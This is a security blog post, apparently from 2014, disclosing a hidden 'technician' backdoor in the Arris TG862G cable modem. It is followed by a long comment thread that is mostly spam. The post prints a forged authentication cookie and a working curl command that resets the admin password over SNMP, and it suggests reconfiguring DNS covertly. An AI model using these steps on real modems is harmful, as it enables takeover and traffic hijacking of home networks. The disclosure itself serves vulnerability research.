Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW
After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}And finally:
{"credential":"technician:"}Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(
That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.
Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:
That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:
Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OKWhat about setting a new value? Surely that will not work....
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:
This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.
The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this
Ya this is really disappointing . I did a talk with a friend a couple years back at HOPE NYC documenting a lot of these insane vulnerabilities in the Arris devices and its very upsetting that two years later people are still finding the same type of issues. Check out http://www.forbes.com/sites/andygreenberg/2012/07/13/researchers-say-time-warner-cable-and-comcast-distribute-wifi-routers-lacking-the-most-rudimentary-security/ You may want to reach out to Andy and give him an update ;)
ReplyDeleteNice find!
ReplyDelete"-TS070563_092012_MODEL_862_GW"
ReplyDeleteModem hadn't been updated. since Sept 20, 2012
Here's one that had, on March 21, 2014:
Software Image Name:TS070659S_032114_MODEL_862_GW_CT
Interesting blog. This is one of my favorite blog also I want you to update more post like this. Thanks for sharing this article.
ReplyDeleteCable operators in Chennai
hahahahaha, amazing. Reminds me once I had a Qwest modem that came with a source code disc in the box.
ReplyDeleteI'm using a TG862G, HW #5, TS070686H_081514_MODEL_862_GW
Looks like an older FW version, but mine doesn't use cookies at all.
It seems to be using an internal user memory, I'll play around with this exploit sometime anyways.
I actually had to dig through the HTML to get the FW version, which they so kindly commented out of the software page. They managed to use JQuery and still make the UI look like garbage. Arris has so much background making modems, you'd think I could have some better features such as data statistics and a device list that's interactive and actually works (70% of the computers it's seen on my network show up as UNKNOWN).
I'm thankful that it's somewhat useful(solid port forwarding, static IPs, white/black listing), but damn.
Hi, what version of burp suite is that?
ReplyDeleteHi. I own Arris TG862G, TWC pushed their firmware on it, it seems much older than discussed here.
ReplyDeleteFirmware Name: TS070563C_032913_MODEL_862_GW_TW_SIP_PC20 Firmware Build Time: Fri Mar 29 2013
I got a permanent password to advanced page/technician. But I don't have URL http://192.168.100.1/cgi-bin/tech_support_cgi, it's 404 and as a result I don't know how to enable SSH. Can anyone help with this old firmware?
hi , what happed? were you able to get in?
Delete?
Deletebeen in contact with cogeco as they make wide use of the arris modems been told they are secure due to all hacks " needing physical access to the modems" I'm not able to explain if this is wrong or not to them and was hoping someone might be able to assist me in the method to demonstrate if the modem is hackable without physical access
ReplyDeletesorry meant to click notify.
ReplyDeleteYour router has been compromised and your network connections are being routed through a malicious remote server. Avast informed me
ReplyDeleteGetting hits from markmonitor in tcpview in sysinternalsuite. Using arris wbm760a docsis 3.0 . Inside command promt under ipconfig im not show any default gateway
Im considering scrapping Os an prolly from torrents, have vpn now. but im infected computer cant find any viruses and malwarebytes isnt detecting anything either but i cant get into my router.
[System Process] 0 TCPV6 [2001:558:6015:1:61c3:51cc:54ee:80f7] 49933 mia07s25-in-x08.1e100.net https TIME_WAIT
ReplyDeletePretty nice post. I have in fact enjoyed reading your website posts. I have been googling blogs and sites in related manner recently and i have to state you have a nice
ReplyDeletePass Box manufacturers
How can you tell if your Manufacturer ARRIS
ReplyDeleteModel Number NVG599
has be compromised or has had someone try to compromise it?
rparkerfl1 at the aol place for DM
This comment has been removed by the author.
ReplyDeleteHTTP/1.1 401 Unauthorized
ReplyDeleteStatus: 401 Denied! - loser
Transfer-Encoding: chunked
Date:
Server: lighttpd
i think they fixed it ;)
This is useful and very Wonderful post, Thanks for shearing something like this article. I like this a whole lot.
ReplyDeleteFree Trial Mcx Commodity Tips
if only all offered the same content as you, the internet would be a far better place..
ReplyDeleteHni Trading Tips
am very late ... thanks and take look on netgear R6200 last firmware version and remember your post 0_^
ReplyDeleteA great blog with good information. Thanks for sharing such a nice information.!!
ReplyDeletedata cabling toronto
I have a arris tg862g modem trying to do it but dont know what I need to do so.
ReplyDeleteplease help
same here what is this password thing on the HSD to access the Advance features how do you get into that
ReplyDeleteThanks for sharing useful information. I like your blog.!!
ReplyDeleteelectrician toronto
I need to know about TG2492LG Arris cable modem,swoft/frimware.... To programming chip....
ReplyDeleteHey, that’s really a good post on pets for sale in Delhi, i really like your blog as the information is very useful if you are a pet lover. Well, there is one more site for the same service www.helpadya.com you should check it for more detail.
ReplyDeleteI like your blog, I think it is quite different concept but quite knowledgeable but I am aware with one more website which is famous for Free Classified Ads Posting Sites www.helpadya.com www.helpadya.com
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteIn This Post, We will explain How to Install Your Netgear Router With Your Internet Modem. We Will Also Guide You in detail All Tricks That You Can Try While Installing Netgear Wireless Router.
ReplyDeleteNetgear Setup
Hi found your blog content very strong I realized after reading Free Classified Ads Posting Sites blog, really such useful information about Free Classified Ads in Real Estate Delhi . Demand for classifieds is increasing day by day with fast pace. I like the information on your blog there is another classified website for same services www.helpadya.com.
ReplyDeleteThank you for posting this informative blog , Here I got a lot of information on different types of modem and their facilities keep it up and I think you should see our products Spectrum Approved Modems
ReplyDeletewe provide the best service of the user who is face any problem that is related to the browser so you can contact our team.
ReplyDeleteMozilla Firefox Support
mozilla firefox support is the best browser for the internet surfing and provides the many facilities of the user like many tabs open at one time, add many extension, etc. If any user faces any issue and problem in the mozilla firefox support like Installation problems, version problem, etc. so you can contact our mozilla firefox customers service team. Microsoft Edge Support
ReplyDeletenice post
ReplyDeleteUAN Passbook Login
Routerlogin Net
Router Login
Your blog is very Valuable. Got a grateful knowledge. Thanks for sharing with arlo login router
ReplyDeletenice.. valuable information..checkout http://linksysmartwifisetup.com for instant help for liksys router login and linksys router
ReplyDeleteYour blog is very accurate info!
ReplyDeleterouterlogin net
routerlogin
Nice post... Very interesting. I really like this post..
ReplyDeletenetgear setup
netgear router login
routerlogin
Excellent Post!
ReplyDeletelinksys router login
linksys login
nice post........
ReplyDeleterouterlogin
netgear router password
routerlogin.net
Interesting post
ReplyDeleterouterlogin
routerlogin net
netgear setup
netgear router login
netgear router password
routerlogin.net
great post.. really like this post.....
ReplyDeletenetgear setup
netgear router login
this post very useful for me, as it contains lot of information. I always prefer to read the quality content and this thing I found in you post. Thanks for sharing. More information
ReplyDeleterouterlogin
routerlogin net
netgear setup
netgear router login
Nice post. Thanks for sharing such great information
ReplyDelete192.168.1.1
Thanks for sharing this masterpiece
ReplyDeleteElectrician in Etobicoke
Electrician in Mississauga
great post..
ReplyDeleterouterlogin admin page
mywifiext
ReplyDeletemywifiext net
mywifiext.net
nice post with valuable information..
ReplyDeleterouterlogin not working
Thanks for the tutorial.. Checkout also the best 5 approved modems for cable TV, VoIP, internet and phone
ReplyDeleteThanks for Sharing this useful information.
ReplyDeletemywifiext.net.
Realy nice post and thanks for sharing this useful articles with us.
ReplyDeletemywifiext
Realy nice post.mywifiext
ReplyDeleteThanks for sharing this useful articles with us. netgear router default login
ReplyDeletenice post with valuable information. Thanks for sharing this usefull information. linksys extender setup-xxx
ReplyDeleteThanks for the post.
ReplyDeleteelectrician
ReplyDeleteConfigure the router settings using default ip address to
192.168.o.1.1
Incredimail customer phone number
ReplyDeleteIncredimail customer service help number
Incredimail customer service numbe
Incredimail customer Support number
Hp Support,
ReplyDeleteHp Support Number,
HP Technical Support,
HP Technical Support Number,
HP Customer Care,
HP Help,
HOW TO UPDATE TOMTOM MAP
ReplyDeleteUPDATE TOMTOM MAP
TOMTOM MAP UPDATE
Has anyone managed to decrypt an arris DG2460a router.data file?
ReplyDeleteHP LaserJet Printer Error code 49
ReplyDeleteHP Error Code 49/49.WX.YZ
HP LaserJet Printer Error code 49.WX.YZ
Wow, this blog is awsome. Thanks for sharing this HP LaserJet Printer.HP LaserJet Printer Error code 49/49.WX.YZ which users face when their device tries to print or try to execute some action that the firmware of the printer is not capable of performing or it can’t carry out the command or it is possible that the command you have given to your device has not been designed to perform. If there is any type of complications you find you can directly visit our website.
Nice post! Thanks for the information!
ReplyDeleteAnyone looking for Mywifiext net new extender setup can get expert assistance from a professional agency anytime and have their Netgear extender setup done in no time.
Thanks for being sharing. Check routerlogin net
ReplyDelete